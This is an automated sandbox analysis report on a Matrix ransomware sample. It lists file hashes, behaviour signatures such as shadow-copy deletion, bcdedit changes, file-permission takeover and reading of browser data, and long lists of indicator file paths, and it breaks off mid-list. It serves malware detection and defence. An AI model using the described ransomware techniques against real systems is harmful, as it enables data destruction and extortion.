Analysis
-
max time kernel
139s -
max time network
135s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
01-02-2022 07:54
Static task
static1
Behavioral task
behavioral1
Sample
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe
Resource
win10v2004-en-20220113
General
-
Target
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe
-
Size
1.2MB
-
MD5
a93bd199d34d21cc9102600c6ce782cf
-
SHA1
31b50d84aa1af4f0e76a523382caba476f6e45dc
-
SHA256
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95
-
SHA512
642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2
Malware Config
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Hearts\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Hearts\fr-FR\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Mahjong\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\Favorites\Windows Live\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Chess\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\permanent\chrome\idb\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\SetupMetrics\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\More Games\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\permanent\chrome\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Purble Place\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Chess\ja-JP\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Solitaire\es-ES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Hearts\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Minesweeper\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\default\moz-extension+++07d856df-5333-4bf9-8746-58ef2201f846^userContextId=4294967295\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Purble Place\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\fonts\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Users\Public\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1320 Process not Found 920 Process not Found -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS tuXIqMZb64.exe -
Executes dropped EXE 64 IoCs
pid Process 1240 NWGGzsKV.exe 1084 tuXIqMZb.exe 2016 tuXIqMZb.exe 1144 tuXIqMZb.exe 1572 tuXIqMZb64.exe 1588 tuXIqMZb.exe 964 tuXIqMZb.exe 1396 tuXIqMZb.exe 588 tuXIqMZb.exe 1324 tuXIqMZb.exe 1556 tuXIqMZb.exe 1240 tuXIqMZb.exe 1252 tuXIqMZb.exe 1100 tuXIqMZb.exe 808 tuXIqMZb.exe 2012 tuXIqMZb.exe 1084 tuXIqMZb.exe 1184 tuXIqMZb.exe 1844 tuXIqMZb.exe 964 tuXIqMZb.exe 960 tuXIqMZb.exe 588 tuXIqMZb.exe 796 tuXIqMZb.exe 1204 tuXIqMZb.exe 1712 tuXIqMZb.exe 804 tuXIqMZb.exe 1776 tuXIqMZb.exe 1624 tuXIqMZb.exe 1512 tuXIqMZb.exe 528 tuXIqMZb.exe 1204 tuXIqMZb.exe 1144 tuXIqMZb.exe 1740 tuXIqMZb.exe 960 tuXIqMZb.exe 1952 tuXIqMZb.exe 1424 tuXIqMZb.exe 324 tuXIqMZb.exe 680 tuXIqMZb.exe 1108 tuXIqMZb.exe 1712 tuXIqMZb.exe 1804 tuXIqMZb.exe 1104 tuXIqMZb.exe 1100 tuXIqMZb.exe 1180 tuXIqMZb.exe 1816 tuXIqMZb.exe 832 tuXIqMZb.exe 1324 tuXIqMZb.exe 1516 tuXIqMZb.exe 1788 tuXIqMZb.exe 1856 tuXIqMZb.exe 1496 tuXIqMZb.exe 2012 tuXIqMZb.exe 692 tuXIqMZb.exe 832 tuXIqMZb.exe 1364 tuXIqMZb.exe 964 tuXIqMZb.exe 1168 tuXIqMZb.exe 1812 tuXIqMZb.exe 900 tuXIqMZb.exe 1172 tuXIqMZb.exe 756 tuXIqMZb.exe 1100 tuXIqMZb.exe 1844 tuXIqMZb.exe 588 tuXIqMZb.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\OutUse.tiff 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Pictures\CopyAdd.tiff 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00060000000131fe-64.dat upx behavioral1/files/0x00060000000131fe-65.dat upx behavioral1/files/0x00060000000131fe-66.dat upx behavioral1/files/0x00060000000131fe-67.dat upx behavioral1/files/0x00060000000131fe-68.dat upx behavioral1/files/0x00060000000131fe-71.dat upx behavioral1/files/0x00060000000131fe-72.dat upx behavioral1/files/0x00060000000131fe-76.dat upx behavioral1/files/0x00060000000131fe-77.dat upx behavioral1/files/0x00060000000131fe-79.dat upx behavioral1/files/0x00060000000131fe-80.dat upx behavioral1/files/0x00060000000131fe-82.dat upx behavioral1/files/0x00060000000131fe-83.dat upx behavioral1/files/0x00060000000131fe-85.dat upx behavioral1/files/0x00060000000131fe-86.dat upx behavioral1/files/0x00060000000131fe-88.dat upx behavioral1/files/0x00060000000131fe-89.dat upx behavioral1/files/0x00060000000131fe-91.dat upx behavioral1/files/0x00060000000131fe-92.dat upx behavioral1/files/0x00060000000131fe-94.dat upx behavioral1/files/0x00060000000131fe-95.dat upx behavioral1/files/0x00060000000131fe-97.dat upx behavioral1/files/0x00060000000131fe-98.dat upx behavioral1/files/0x00060000000131fe-100.dat upx behavioral1/files/0x00060000000131fe-101.dat upx behavioral1/files/0x00060000000131fe-103.dat upx behavioral1/files/0x00060000000131fe-104.dat upx behavioral1/files/0x00060000000131fe-106.dat upx behavioral1/files/0x00060000000131fe-107.dat upx behavioral1/files/0x00060000000131fe-109.dat upx behavioral1/files/0x00060000000131fe-110.dat upx behavioral1/files/0x00060000000131fe-112.dat upx behavioral1/files/0x00060000000131fe-113.dat upx behavioral1/files/0x00060000000131fe-115.dat upx behavioral1/files/0x00060000000131fe-116.dat upx behavioral1/files/0x00060000000131fe-118.dat upx behavioral1/files/0x00060000000131fe-119.dat upx behavioral1/files/0x00060000000131fe-121.dat upx behavioral1/files/0x00060000000131fe-122.dat upx behavioral1/files/0x00060000000131fe-124.dat upx behavioral1/files/0x00060000000131fe-125.dat upx behavioral1/files/0x00060000000131fe-127.dat upx behavioral1/files/0x00060000000131fe-128.dat upx behavioral1/files/0x00060000000131fe-130.dat upx behavioral1/files/0x00060000000131fe-131.dat upx behavioral1/files/0x00060000000131fe-133.dat upx behavioral1/files/0x00060000000131fe-134.dat upx behavioral1/files/0x00060000000131fe-136.dat upx behavioral1/files/0x00060000000131fe-137.dat upx behavioral1/files/0x00060000000131fe-139.dat upx behavioral1/files/0x00060000000131fe-140.dat upx behavioral1/files/0x00060000000131fe-142.dat upx behavioral1/files/0x00060000000131fe-143.dat upx behavioral1/files/0x00060000000131fe-145.dat upx behavioral1/files/0x00060000000131fe-146.dat upx behavioral1/files/0x00060000000131fe-148.dat upx -
Loads dropped DLL 64 IoCs
pid Process 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 1124 cmd.exe 1224 cmd.exe 956 cmd.exe 2016 tuXIqMZb.exe 1356 cmd.exe 1740 cmd.exe 1120 cmd.exe 1624 cmd.exe 1516 cmd.exe 528 cmd.exe 1484 cmd.exe 1136 cmd.exe 2024 cmd.exe 1984 cmd.exe 1648 cmd.exe 1816 cmd.exe 832 cmd.exe 1216 cmd.exe 1104 cmd.exe 1484 cmd.exe 1592 cmd.exe 680 cmd.exe 1180 cmd.exe 1324 cmd.exe 460 cmd.exe 1168 cmd.exe 1736 cmd.exe 2024 cmd.exe 408 cmd.exe 2008 cmd.exe 1824 cmd.exe 1184 cmd.exe 1844 cmd.exe 956 cmd.exe 1512 cmd.exe 1984 cmd.exe 1556 cmd.exe 864 cmd.exe 1900 cmd.exe 1084 cmd.exe 1356 cmd.exe 1752 cmd.exe 528 cmd.exe 2012 cmd.exe 1900 cmd.exe 1504 cmd.exe 1768 cmd.exe 1848 cmd.exe 1616 cmd.exe 900 cmd.exe 1648 cmd.exe 324 cmd.exe 848 cmd.exe 1984 cmd.exe 1768 cmd.exe 1588 cmd.exe 1688 cmd.exe 1744 cmd.exe 680 cmd.exe 1196 cmd.exe 1952 cmd.exe 1740 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 1740 takeown.exe 996 takeown.exe 904 takeown.exe 1844 takeown.exe 1960 Process not Found 1444 takeown.exe 1052 takeown.exe 1108 takeown.exe 2044 Process not Found 1632 Process not Found 1320 Process not Found 2008 takeown.exe 1204 takeown.exe 752 takeown.exe 1188 Process not Found 1516 takeown.exe 1776 Process not Found 900 Process not Found 1000 takeown.exe 1516 takeown.exe 1168 takeown.exe 796 Process not Found 1740 takeown.exe 980 takeown.exe 1960 Process not Found 1736 takeown.exe 1624 takeown.exe 1168 takeown.exe 1960 Process not Found 1844 takeown.exe 1564 takeown.exe 1736 Process not Found 1620 takeown.exe 1564 Process not Found 1364 takeown.exe 1516 takeown.exe 980 Process not Found 2008 Process not Found 1588 takeown.exe 772 takeown.exe 1712 takeown.exe 1204 takeown.exe 1424 takeown.exe 1104 takeown.exe 1984 Process not Found 680 takeown.exe 1108 takeown.exe 1740 takeown.exe 2008 takeown.exe 1656 Process not Found 1900 takeown.exe 552 Process not Found 952 Process not Found 1724 takeown.exe 1108 takeown.exe 920 Process not Found 1984 takeown.exe 1620 takeown.exe 796 takeown.exe 1624 takeown.exe 1564 Process not Found 1588 takeown.exe 1424 takeown.exe 2044 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 41 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Videos\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\H2R8HLJC\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Links\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E16QEJ8K\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZZZ3YRT4\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VL9MRVWS\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Music\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Music\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Documents\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\R: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\J: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\F: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\Y: tuXIqMZb64.exe File opened (read-only) \??\Z: tuXIqMZb64.exe File opened (read-only) \??\Z: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\O: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\H: tuXIqMZb64.exe File opened (read-only) \??\O: tuXIqMZb64.exe File opened (read-only) \??\X: 